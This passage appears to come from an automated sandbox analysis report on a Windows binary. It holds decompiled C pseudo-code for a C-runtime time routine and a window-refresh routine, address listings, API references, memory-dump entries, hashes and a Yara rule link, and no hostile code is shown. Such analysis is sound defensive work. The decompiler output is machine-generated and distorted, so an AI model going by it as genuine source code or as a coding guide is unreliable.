																goto L37;
															}
														}
													}
													goto L39;
												}
											} else {
												if(__eflags > 0) {
													L18:
													asm("cdq");
													asm("sbb ebx, edx");
													_v24 = _t271 - _v8;
													_v20 = _t235;
													_t131 = E0128FB5B(_t288,  &_v24);
													__eflags = _t131;
													if(_t131 == 0) {
														__eflags = _v12 - _t131;
														if(__eflags == 0) {
															L39:
															_t131 = 0;
														} else {
															_push(_t288);
															_t225 = E0128FDD6(_t235, _t288, _t301, __eflags);
															__eflags = _t225;
															if(_t225 == 0) {
																goto L39;
															} else {
																asm("cdq");
																_v24 = _v24 - _v16;
																asm("sbb [ebp-0x10], edx");
																_t131 = E0128FB5B(_t288,  &_v24);
																__eflags = _t131;
																if(_t131 == 0) {
																	_t288[8] = 1;
																	goto L39;
																}
															}
														}
													}
												} else {
													__eflags = _t271 - 0x3f480;
													if(_t271 <= 0x3f480) {
														goto L23;
													} else {
														goto L18;
													}
												}
											}
											goto L3;
										}
									}
								}
							} else {
								if(__eflags > 0) {
									goto L8;
								} else {
									__eflags =  *_t301 - 0x93406fff;
									if(__eflags > 0) {
										goto L8;
									} else {
										goto L12;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L8:
								_t228 = E01285A48();
								_t302 = 0x16;
								 *_t228 = _t302;
								goto L2;
							} else {
								__eflags =  *_t301;
								if( *_t301 >= 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					L1:
					_t129 = E01285A48();
					_t302 = 0x16;
					 *_t129 = _t302;
					E012882AA();
					L2:
					_t131 = _t302;
					L3:
					return _t131;
				}
			}



















































































                                                                                                                0x01287914
                                                                                                                0x0128791a
                                                                                                                0x0128791b
                                                                                                                0x0128791e
                                                                                                                0x0128791f
                                                                                                                0x01287922
                                                                                                                0x01287925
                                                                                                                0x01287928
                                                                                                                0x0128792d
                                                                                                                0x0128794f
                                                                                                                0x01287954
                                                                                                                0x01287957
                                                                                                                0x0128795a
                                                                                                                0x0128795c
                                                                                                                0x00000000
                                                                                                                0x0128795e
                                                                                                                0x0128795e
                                                                                                                0x01287961
                                                                                                                0x01287975
                                                                                                                0x01287977
                                                                                                                0x01287978
                                                                                                                0x0128797b
                                                                                                                0x01287987
                                                                                                                0x01287987
                                                                                                                0x01287990
                                                                                                                0x01287996
                                                                                                                0x01287998
                                                                                                                0x01287b83
                                                                                                                0x01287b83
                                                                                                                0x01287b84
                                                                                                                0x01287b85
                                                                                                                0x01287b86
                                                                                                                0x01287b87
                                                                                                                0x01287b88
                                                                                                                0x01287b8d
                                                                                                                0x01287b8f
                                                                                                                0x01287b94
                                                                                                                0x01287b9b
                                                                                                                0x01287b9e
                                                                                                                0x01287ba2
                                                                                                                0x01287ba6
                                                                                                                0x01287ba7
                                                                                                                0x01287baa
                                                                                                                0x01287bad
                                                                                                                0x01287baf
                                                                                                                0x01287bcb
                                                                                                                0x01287bce
                                                                                                                0x01287bcf
                                                                                                                0x01287bd0
                                                                                                                0x01287bd1
                                                                                                                0x01287bd3
                                                                                                                0x01287bd5
                                                                                                                0x01287bd8
                                                                                                                0x01287bdd
                                                                                                                0x01287be0
                                                                                                                0x01287be3
                                                                                                                0x01287be5
                                                                                                                0x01287e10
                                                                                                                0x01287e10
                                                                                                                0x01287e15
                                                                                                                0x01287e1e
                                                                                                                0x01287e1e
                                                                                                                0x00000000
                                                                                                                0x01287beb
                                                                                                                0x01287beb
                                                                                                                0x01287bf8
                                                                                                                0x01287bf8
                                                                                                                0x01287bfb
                                                                                                                0x01287bfd
                                                                                                                0x01287c04
                                                                                                                0x01287c06
                                                                                                                0x01287c07
                                                                                                                0x01287c08
                                                                                                                0x01287c0a
                                                                                                                0x01287c0c
                                                                                                                0x01287c0d
                                                                                                                0x01287c0f
                                                                                                                0x01287c12
                                                                                                                0x01287c15
                                                                                                                0x01287c17
                                                                                                                0x01287c1a
                                                                                                                0x01287c1c
                                                                                                                0x01287c1e
                                                                                                                0x01287c1e
                                                                                                                0x01287c21
                                                                                                                0x01287c24
                                                                                                                0x01287c27
                                                                                                                0x01287c2a
                                                                                                                0x01287c2d
                                                                                                                0x01287c2d
                                                                                                                0x01287c34
                                                                                                                0x01287c37
                                                                                                                0x01287c3a
                                                                                                                0x01287c3c
                                                                                                                0x00000000
                                                                                                                0x01287c42
                                                                                                                0x01287c42
                                                                                                                0x00000000
                                                                                                                0x01287c44
                                                                                                                0x01287c44
                                                                                                                0x01287c4a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01287c4a
                                                                                                                0x01287c42
                                                                                                                0x01287bff
                                                                                                                0x01287bff
                                                                                                                0x01287c02
                                                                                                                0x01287c50
                                                                                                                0x01287c50
                                                                                                                0x01287c55
                                                                                                                0x01287c61
                                                                                                                0x01287c63
                                                                                                                0x01287c65
                                                                                                                0x01287c69
                                                                                                                0x01287c71
                                                                                                                0x01287c71
                                                                                                                0x01287c73
                                                                                                                0x01287c83
                                                                                                                0x01287c94
                                                                                                                0x01287c99
                                                                                                                0x01287c9e
                                                                                                                0x01287ca0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01287c75
                                                                                                                0x01287c7a
                                                                                                                0x01287c7f
                                                                                                                0x01287c81
                                                                                                                0x01287ca2
                                                                                                                0x01287ca2
                                                                                                                0x01287ca6
                                                                                                                0x01287cab
                                                                                                                0x01287cae
                                                                                                                0x01287cae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01287c81
                                                                                                                0x01287cbe
                                                                                                                0x01287ccc
                                                                                                                0x01287cd1
                                                                                                                0x01287ce5
                                                                                                                0x01287ce9
                                                                                                                0x01287cec
                                                                                                                0x01287cf3
                                                                                                                0x01287cfc
                                                                                                                0x01287cfe
                                                                                                                0x01287d08
                                                                                                                0x01287d18
                                                                                                                0x01287d20
                                                                                                                0x01287d27
                                                                                                                0x01287d30
                                                                                                                0x01287d34
                                                                                                                0x01287d39
                                                                                                                0x01287d46
                                                                                                                0x01287d49
                                                                                                                0x01287d4d
                                                                                                                0x01287d59
                                                                                                                0x01287d5f
                                                                                                                0x01287d63
                                                                                                                0x01287d6a
                                                                                                                0x01287d6e
                                                                                                                0x01287d71
                                                                                                                0x01287d73
                                                                                                                0x01287d76
                                                                                                                0x01287d79
                                                                                                                0x01287d7c
                                                                                                                0x01287df3
                                                                                                                0x00000000
                                                                                                                0x01287d7e
                                                                                                                0x01287d7e
                                                                                                                0x01287d87
                                                                                                                0x01287d8d
                                                                                                                0x01287d8f
                                                                                                                0x01287e31
                                                                                                                0x01287e31
                                                                                                                0x01287e32
                                                                                                                0x01287e33
                                                                                                                0x01287e34
                                                                                                                0x01287e35
                                                                                                                0x01287e36
                                                                                                                0x01287e3b
                                                                                                                0x01287e3c
                                                                                                                0x01287e3f
                                                                                                                0x01287e41
                                                                                                                0x01287e44
                                                                                                                0x01287e4c
                                                                                                                0x01287d95
                                                                                                                0x01287d99
                                                                                                                0x01287d9f
                                                                                                                0x01287da1
                                                                                                                0x00000000
                                                                                                                0x01287da7
                                                                                                                0x01287daa
                                                                                                                0x01287dab
                                                                                                                0x01287db2
                                                                                                                0x01287db9
                                                                                                                0x01287dc0
                                                                                                                0x01287dc2
                                                                                                                0x00000000
                                                                                                                0x01287dc4
                                                                                                                0x01287dc7
                                                                                                                0x01287dc9
                                                                                                                0x01287dd2
                                                                                                                0x01287dd5
                                                                                                                0x01287dd6
                                                                                                                0x01287ddd
                                                                                                                0x01287de4
                                                                                                                0x01287df8
                                                                                                                0x01287dfa
                                                                                                                0x01287dfc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01287dcb
                                                                                                                0x01287dcb
                                                                                                                0x01287dfe
                                                                                                                0x01287e04
                                                                                                                0x01287e0b
                                                                                                                0x01287e0c
                                                                                                                0x01287dcd
                                                                                                                0x01287dcd
                                                                                                                0x01287dd0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01287dd0
                                                                                                                0x01287dcb
                                                                                                                0x01287dc9
                                                                                                                0x01287e20
                                                                                                                0x01287e20
                                                                                                                0x01287e21
                                                                                                                0x00000000
                                                                                                                0x01287e21
                                                                                                                0x01287da1
                                                                                                                0x01287d8f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01287c02
                                                                                                                0x01287bed
                                                                                                                0x01287bed
                                                                                                                0x01287bf2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01287bf2
                                                                                                                0x01287beb
                                                                                                                0x01287bb1
                                                                                                                0x01287bb6
                                                                                                                0x01287bc4
                                                                                                                0x01287e22
                                                                                                                0x01287e25
                                                                                                                0x01287e27
                                                                                                                0x01287e30
                                                                                                                0x01287e30
                                                                                                                0x0128799e
                                                                                                                0x012879a2
                                                                                                                0x012879a8
                                                                                                                0x012879aa
                                                                                                                0x00000000
                                                                                                                0x012879b0
                                                                                                                0x012879b4
                                                                                                                0x012879ba
                                                                                                                0x012879bc
                                                                                                                0x00000000
                                                                                                                0x012879c2
                                                                                                                0x012879c2
                                                                                                                0x012879c5
                                                                                                                0x012879c7
                                                                                                                0x012879c9
                                                                                                                0x01287a39
                                                                                                                0x01287a3b
                                                                                                                0x01287a42
                                                                                                                0x01287a44
                                                                                                                0x01287a4a
                                                                                                                0x01287a4d
                                                                                                                0x01287a7c
                                                                                                                0x01287a7e
                                                                                                                0x01287a81
                                                                                                                0x01287a86
                                                                                                                0x01287a87
                                                                                                                0x01287a89
                                                                                                                0x01287a4f
                                                                                                                0x01287a4f
                                                                                                                0x01287a50
                                                                                                                0x01287a56
                                                                                                                0x01287a58
                                                                                                                0x00000000
                                                                                                                0x01287a5a
                                                                                                                0x01287a60
                                                                                                                0x01287a63
                                                                                                                0x01287a6e
                                                                                                                0x01287a71
                                                                                                                0x01287a73
                                                                                                                0x01287a75
                                                                                                                0x01287a78
                                                                                                                0x01287a78
                                                                                                                0x01287a58
                                                                                                                0x01287a91
                                                                                                                0x01287a96
                                                                                                                0x01287a98
                                                                                                                0x01287a9a
                                                                                                                0x01287a9f
                                                                                                                0x01287aa2
                                                                                                                0x01287aa4
                                                                                                                0x01287aa4
                                                                                                                0x01287aad
                                                                                                                0x01287ab4
                                                                                                                0x01287ab9
                                                                                                                0x01287aba
                                                                                                                0x01287ac0
                                                                                                                0x01287ac4
                                                                                                                0x01287ac9
                                                                                                                0x01287acc
                                                                                                                0x01287ace
                                                                                                                0x01287ad3
                                                                                                                0x01287ad6
                                                                                                                0x01287ad9
                                                                                                                0x01287ad9
                                                                                                                0x01287ae2
                                                                                                                0x01287ae9
                                                                                                                0x01287aee
                                                                                                                0x01287aef
                                                                                                                0x01287af5
                                                                                                                0x01287af9
                                                                                                                0x01287afe
                                                                                                                0x01287b01
                                                                                                                0x01287b03
                                                                                                                0x01287b08
                                                                                                                0x01287b0b
                                                                                                                0x01287b0e
                                                                                                                0x01287b0e
                                                                                                                0x01287b1c
                                                                                                                0x01287b1e
                                                                                                                0x01287b20
                                                                                                                0x01287b4d
                                                                                                                0x01287b53
                                                                                                                0x01287b5a
                                                                                                                0x01287b5b
                                                                                                                0x01287b5e
                                                                                                                0x01287b61
                                                                                                                0x01287b64
                                                                                                                0x01287b66
                                                                                                                0x00000000
                                                                                                                0x01287b68
                                                                                                                0x01287b6b
                                                                                                                0x01287b72
                                                                                                                0x01287b75
                                                                                                                0x01287b7b
                                                                                                                0x01287b7e
                                                                                                                0x01287b7e
                                                                                                                0x01287b22
                                                                                                                0x01287b22
                                                                                                                0x01287b28
                                                                                                                0x01287b2f
                                                                                                                0x01287b30
                                                                                                                0x01287b33
                                                                                                                0x01287b33
                                                                                                                0x01287b33
                                                                                                                0x01287b36
                                                                                                                0x01287b39
                                                                                                                0x01287b39
                                                                                                                0x01287b39
                                                                                                                0x01287b39
                                                                                                                0x01287b24
                                                                                                                0x01287b24
                                                                                                                0x01287b26
                                                                                                                0x01287b43
                                                                                                                0x01287b45
                                                                                                                0x01287b47
                                                                                                                0x00000000
                                                                                                                0x01287b49
                                                                                                                0x01287b49
                                                                                                                0x01287b4b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01287b4b
                                                                                                                0x01287b47
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01287b26
                                                                                                                0x01287b22
                                                                                                                0x00000000
                                                                                                                0x01287b20
                                                                                                                0x012879cb
                                                                                                                0x012879cb
                                                                                                                0x012879d5
                                                                                                                0x012879d8
                                                                                                                0x012879df
                                                                                                                0x012879e1
                                                                                                                0x012879e5
                                                                                                                0x012879e8
                                                                                                                0x012879ef
                                                                                                                0x012879f1
                                                                                                                0x012879f7
                                                                                                                0x012879fa
                                                                                                                0x01287b3c
                                                                                                                0x01287b3c
                                                                                                                0x01287a00
                                                                                                                0x01287a00
                                                                                                                0x01287a01
                                                                                                                0x01287a07
                                                                                                                0x01287a09
                                                                                                                0x00000000
                                                                                                                0x01287a0f
                                                                                                                0x01287a12
                                                                                                                0x01287a13
                                                                                                                0x01287a1a
                                                                                                                0x01287a1e
                                                                                                                0x01287a25
                                                                                                                0x01287a27
                                                                                                                0x01287a2d
                                                                                                                0x00000000
                                                                                                                0x01287a2d
                                                                                                                0x01287a27
                                                                                                                0x01287a09
                                                                                                                0x012879fa
                                                                                                                0x012879cd
                                                                                                                0x012879cd
                                                                                                                0x012879d3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012879d3
                                                                                                                0x012879cb
                                                                                                                0x00000000
                                                                                                                0x012879c9
                                                                                                                0x012879bc
                                                                                                                0x012879aa
                                                                                                                0x0128797d
                                                                                                                0x0128797d
                                                                                                                0x00000000
                                                                                                                0x0128797f
                                                                                                                0x0128797f
                                                                                                                0x01287985
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01287985
                                                                                                                0x0128797d
                                                                                                                0x01287963
                                                                                                                0x01287963
                                                                                                                0x01287969
                                                                                                                0x01287969
                                                                                                                0x01287970
                                                                                                                0x01287971
                                                                                                                0x00000000
                                                                                                                0x01287965
                                                                                                                0x01287965
                                                                                                                0x01287967
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01287967
                                                                                                                0x01287963
                                                                                                                0x01287961
                                                                                                                0x0128792f
                                                                                                                0x0128792f
                                                                                                                0x0128792f
                                                                                                                0x01287936
                                                                                                                0x01287937
                                                                                                                0x01287939
                                                                                                                0x0128793e
                                                                                                                0x0128793e
                                                                                                                0x01287940
                                                                                                                0x01287946
                                                                                                                0x01287946

                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0128794F
                                                                                                                  • Part of subcall function 01285A48: __getptd_noexit.LIBCMT ref: 01285A48
                                                                                                                • __gmtime64_s.LIBCMT ref: 012879E8
                                                                                                                • __gmtime64_s.LIBCMT ref: 01287A1E
                                                                                                                • __gmtime64_s.LIBCMT ref: 01287A3B
                                                                                                                • __allrem.LIBCMT ref: 01287A91
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01287AAD
                                                                                                                • __allrem.LIBCMT ref: 01287AC4
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01287AE2
                                                                                                                • __allrem.LIBCMT ref: 01287AF9
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01287B17
                                                                                                                • __invoke_watson.LIBCMT ref: 01287B88
                                                                                                                • __allrem.LIBCMT ref: 01287C6C
                                                                                                                • __allrem.LIBCMT ref: 01287C7A
                                                                                                                • __allrem.LIBCMT ref: 01287C99
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01287CD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: __allrem$Unothrow_t@std@@@__ehfuncinfo$??2@$__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 763287385-0
                                                                                                                • Opcode ID: f01c3ac101f6f0aa0143373341eb80fc57f900c5de44921c04a75892774fa092
                                                                                                                • Instruction ID: 43fcedda7ad98476a9070b4c01ca104dbb81099d583fcc78d74b315ccde8844a
                                                                                                                • Opcode Fuzzy Hash: f01c3ac101f6f0aa0143373341eb80fc57f900c5de44921c04a75892774fa092
                                                                                                                • Instruction Fuzzy Hash: EC91C771A22707ABE714FE7DCC81B6AB7A9AF14364F248229E614D76C1F770E94087D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01272F13, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 325windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E01272F13(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, intOrPtr __esi, void* __eflags) {
				intOrPtr _t170;
				void* _t184;
				signed int _t201;
				signed int _t206;
				void* _t242;
				signed int _t253;
				signed int _t300;
				intOrPtr* _t326;
				void* _t329;
				signed int _t331;

				_t327 = __esi;
				_t324 = __edx;
				_push(0x150);
				E01285BAD(E012978D0, __ebx, __edi, __esi);
				_t326 = __ecx;
				_t251 = __ecx + 0x3c;
				E01272AB1(__ecx + 0x3c, __edx, __ecx);
				 *(_t326 + 0xc4) = 1;
				_t331 = ( *(_t326 + 0xb4) & 0x00000030) - 0x30;
				if(_t331 != 0) {
					L26:
					E01272AB1(_t251, _t324, _t326);
					E01272AB1(_t326 + 0x20, _t324, _t326);
					 *(_t326 + 0xc4) =  *(_t326 + 0xc4) & 0x00000000;
					__eflags = 1;
					return E01285B5C(_t251, _t326, _t327);
				} else {
					 *((intOrPtr*)(_t329 - 0x138)) = 0;
					 *((intOrPtr*)(_t329 - 0x134)) = 0;
					asm("sbb eax, eax");
					 *((intOrPtr*)(_t329 - 0x130)) = 0;
					 *((intOrPtr*)(_t329 - 0x12c)) = 0;
					 *((intOrPtr*)(_t329 - 0x128)) = 0;
					 *((intOrPtr*)(_t329 - 0x124)) = 0;
					 *(_t329 - 0x14c) =  ~( *(_t326 + 0x10));
					while(_t331 != 0) {
						_t328 = _t326 + 4;
						E01261AE0(_t329 - 0x13c, _t326, _t326 + 4, E0126811C());
						 *(_t329 - 4) =  *(_t329 - 4) & 0x00000000;
						E01261AE0(_t329 - 0x140, _t326, _t326 + 4, E0126811C());
						 *(_t329 - 4) = 1;
						E01272080(_t251, _t328, _t326, _t328, _t329 - 0x14c, _t329 - 0x13c, _t329 - 0x140);
						_t327 =  *((intOrPtr*)(_t329 - 0x140));
						if( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x140)) - 0xc)) == 0 || E0127FD95(_t324, _t326, _t327, _t329 - 0x138, 0) == 0) {
							E012615E0(_t327 - 0x10, _t324);
							 *(_t329 - 4) =  *(_t329 - 4) | 0xffffffff;
							E012615E0( *((intOrPtr*)(_t329 - 0x13c)) - 0x10, _t324);
							_t331 =  *(_t329 - 0x14c);
							continue;
						} else {
							E012615E0(_t327 - 0x10, _t324);
							_t32 = _t329 - 4;
							 *_t32 =  *(_t329 - 4) | 0xffffffff;
							__eflags =  *_t32;
							E012615E0( *((intOrPtr*)(_t329 - 0x13c)) - 0x10, _t324);
							 *((intOrPtr*)( *_t326 + 0x60))();
							asm("sbb eax, eax");
							 *(_t329 - 0x14c) =  ~( *(_t326 + 0x10));
							if(__eflags == 0) {
								goto L26;
							} else {
								goto L7;
							}
							do {
								L7:
								E01261AE0(_t329 - 0x13c, _t326, _t327, E0126811C());
								 *(_t329 - 4) = 2;
								E01261AE0(_t329 - 0x140, _t326, _t327, E0126811C());
								 *(_t329 - 4) = 3;
								E01272080(_t251, _t326 + 4, _t326, _t327, _t329 - 0x14c, _t329 - 0x13c, _t329 - 0x140);
								_t170 =  *((intOrPtr*)(_t329 - 0x140));
								_t327 =  *((intOrPtr*)(_t329 - 0x13c));
								__eflags =  *(_t170 - 0xc);
								if( *(_t170 - 0xc) == 0) {
									goto L25;
								}
								__eflags = E0127FD95(_t324, _t326, _t170, _t329 - 0x138, 0);
								if(__eflags == 0) {
									goto L25;
								}
								E012723D2(_t251, __eflags, _t327, _t329 - 0x145);
								__eflags =  *((char*)(_t329 - 0x145));
								if(__eflags == 0) {
									E012627DE(_t251, E0127164E(_t251, _t326, _t327), _t327, 0x1299909);
									 *((intOrPtr*)( *_t326 + 0x54))(_t329 - 0x140);
									goto L25;
								}
								SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(E012692A5(_t251, _t326, _t327, __eflags) + 4)))) + 0x74))() + 0x20), 0xb, 0, 0);
								_t184 = E012692A5(0, _t326, _t327, __eflags);
								_t253 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t184 + 4)))) + 0xa0))( *((intOrPtr*)(_t329 - 0x140)), 0);
								__eflags = _t253;
								if(__eflags == 0) {
									SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(E012692A5(_t253, _t326, _t327, __eflags) + 4)))) + 0x74))() + 0x20), 0xb, "true", 0);
									InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(E012692A5(_t253, _t326, _t327, __eflags) + 4)))) + 0x74))() + 0x20), 0, "true");
									UpdateWindow( *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(E012692A5(_t253, _t326, _t327, __eflags) + 4)))) + 0x74))() + 0x20));
									L23:
									_t251 = _t326 + 0x3c;
									goto L25;
								}
								E01261AE0(_t329 - 0x144, _t326, _t327, E0126811C());
								 *(_t329 - 4) = 4;
								_t201 = E0128700E(_t327, ":/\");
								__eflags = _t201;
								if(_t201 == 0) {
									L14:
									 *((intOrPtr*)( *_t253 + 0x5c))();
									E0126379B(_t329 - 0x144, _t329 - 0x13c);
									_t206 = E012870EF(_t327, 0x2e);
									__eflags = _t206;
									if(__eflags != 0) {
										_t240 = _t206 - _t327;
										__eflags = _t206 - _t327;
										if(__eflags > 0) {
											_t242 = E01272303(_t253, _t329 - 0x13c, _t329 - 0x15c, _t240);
											 *(_t329 - 4) = 5;
											E0126379B(_t329 - 0x144, _t242);
											 *(_t329 - 4) = 4;
											E012615E0( *((intOrPtr*)(_t329 - 0x15c)) - 0x10, _t324);
										}
									}
									 *((intOrPtr*)( *_t253 + 0x54))( *((intOrPtr*)(_t329 - 0x144)));
									L18:
									 *((intOrPtr*)( *_t326 + 0x68))(_t329 - 0x158, _t253);
									 *(_t329 - 4) = 6;
									E0126379B(E0127157C(_t253, _t324, _t326, __eflags, _t253), _t329 - 0x158);
									 *(_t329 - 0x150) =  *(_t329 - 0x150) & 0x00000000;
									E0127237A(_t326 + 0x20, __eflags, _t327, _t329 - 0x150);
									_t300 =  *(_t329 - 0x150);
									__eflags = _t300;
									if(__eflags != 0) {
										__eflags = _t300 - _t253;
										if(__eflags != 0) {
											 *((intOrPtr*)( *_t300 + 0x84))();
										}
									}
									 *((intOrPtr*)( *_t253 + 0x64))("true");
									SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(E012692A5(_t253, _t326, _t327, __eflags) + 4)))) + 0x74))() + 0x20), 0xb, "true", 0);
									InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(E012692A5(_t253, _t326, _t327, __eflags) + 4)))) + 0x74))() + 0x20), 0, "true");
									UpdateWindow( *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(E012692A5(_t253, _t326, _t327, __eflags) + 4)))) + 0x74))() + 0x20));
									E0126379B(E0127157C(_t253, _t324, _t326, __eflags, _t253), _t329 - 0x144);
									 *((intOrPtr*)( *_t326 + 0x70))(_t329 - 0x154, _t329 - 0x144);
									 *(_t329 - 4) = 7;
									 *((intOrPtr*)( *_t253 + 0x54))( *((intOrPtr*)(_t329 - 0x154)));
									E012615E0( *((intOrPtr*)(_t329 - 0x154)) - 0x10, _t324);
									E012615E0( *((intOrPtr*)(_t329 - 0x158)) - 0x10, _t324);
									E012615E0( *((intOrPtr*)(_t329 - 0x144)) - 0x10, _t324);
									goto L23;
								}
								__eflags = _t201 - _t327 - 0xffffffff;
								if(_t201 - _t327 == 0xffffffff) {
									goto L14;
								}
								 *((intOrPtr*)( *_t253 + 0x58))(_t327, 0);
								_t61 = _t253 + 0x20; // 0x20
								E0126379B(_t329 - 0x144, _t61);
								goto L18;
								L25:
								E012615E0( *((intOrPtr*)(_t329 - 0x140)) - 0x10, _t324);
								 *(_t329 - 4) =  *(_t329 - 4) | 0xffffffff;
								E012615E0(_t327 - 0x10, _t324);
								__eflags =  *(_t329 - 0x14c);
							} while ( *(_t329 - 0x14c) != 0);
							goto L26;
						}
					}
					goto L26;
				}
			}













                                                                                                                0x01272f13
                                                                                                                0x01272f13
                                                                                                                0x01272f13
                                                                                                                0x01272f1d
                                                                                                                0x01272f22
                                                                                                                0x01272f24
                                                                                                                0x01272f29
                                                                                                                0x01272f39
                                                                                                                0x01272f43
                                                                                                                0x01272f45
                                                                                                                0x0127337b
                                                                                                                0x0127337d
                                                                                                                0x01273385
                                                                                                                0x0127338a
                                                                                                                0x01273393
                                                                                                                0x01273399
                                                                                                                0x01272f4b
                                                                                                                0x01272f50
                                                                                                                0x01272f56
                                                                                                                0x01272f5c
                                                                                                                0x01272f5e
                                                                                                                0x01272f64
                                                                                                                0x01272f6a
                                                                                                                0x01272f70
                                                                                                                0x01272f76
                                                                                                                0x01272f7c
                                                                                                                0x01272f82
                                                                                                                0x01272f91
                                                                                                                0x01272f96
                                                                                                                0x01272fa6
                                                                                                                0x01272fb1
                                                                                                                0x01272fc6
                                                                                                                0x01272fcb
                                                                                                                0x01272fd5
                                                                                                                0x01272fed
                                                                                                                0x01272ff8
                                                                                                                0x01272fff
                                                                                                                0x01273004
                                                                                                                0x00000000
                                                                                                                0x01273010
                                                                                                                0x01273013
                                                                                                                0x0127301e
                                                                                                                0x0127301e
                                                                                                                0x0127301e
                                                                                                                0x01273025
                                                                                                                0x0127302e
                                                                                                                0x01273036
                                                                                                                0x01273038
                                                                                                                0x0127303e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01273044
                                                                                                                0x01273044
                                                                                                                0x01273050
                                                                                                                0x01273055
                                                                                                                0x01273068
                                                                                                                0x01273073
                                                                                                                0x01273089
                                                                                                                0x0127308e
                                                                                                                0x01273094
                                                                                                                0x0127309a
                                                                                                                0x0127309e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012730b3
                                                                                                                0x012730b5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012730c5
                                                                                                                0x012730ca
                                                                                                                0x012730d1
                                                                                                                0x01273341
                                                                                                                0x01273351
                                                                                                                0x00000000
                                                                                                                0x01273351
                                                                                                                0x012730ed
                                                                                                                0x012730f3
                                                                                                                0x0127310a
                                                                                                                0x0127310c
                                                                                                                0x0127310e
                                                                                                                0x012732f6
                                                                                                                0x01273310
                                                                                                                0x01273326
                                                                                                                0x0127332c
                                                                                                                0x0127332c
                                                                                                                0x00000000
                                                                                                                0x0127332c
                                                                                                                0x01273120
                                                                                                                0x0127312b
                                                                                                                0x0127312f
                                                                                                                0x01273136
                                                                                                                0x01273138
                                                                                                                0x0127315c
                                                                                                                0x01273160
                                                                                                                0x01273170
                                                                                                                0x01273178
                                                                                                                0x0127317f
                                                                                                                0x01273181
                                                                                                                0x01273183
                                                                                                                0x01273185
                                                                                                                0x01273187
                                                                                                                0x01273197
                                                                                                                0x012731a3
                                                                                                                0x012731a7
                                                                                                                0x012731b2
                                                                                                                0x012731b9
                                                                                                                0x012731b9
                                                                                                                0x01273187
                                                                                                                0x012731c8
                                                                                                                0x012731cb
                                                                                                                0x012731d7
                                                                                                                0x012731de
                                                                                                                0x012731f0
                                                                                                                0x012731f5
                                                                                                                0x01273207
                                                                                                                0x0127320c
                                                                                                                0x01273212
                                                                                                                0x01273214
                                                                                                                0x01273216
                                                                                                                0x01273218
                                                                                                                0x0127321c
                                                                                                                0x0127321c
                                                                                                                0x01273218
                                                                                                                0x01273228
                                                                                                                0x01273241
                                                                                                                0x0127325b
                                                                                                                0x01273271
                                                                                                                0x01273289
                                                                                                                0x012732a0
                                                                                                                0x012732ad
                                                                                                                0x012732b1
                                                                                                                0x012732bd
                                                                                                                0x012732cb
                                                                                                                0x012732d9
                                                                                                                0x00000000
                                                                                                                0x012732d9
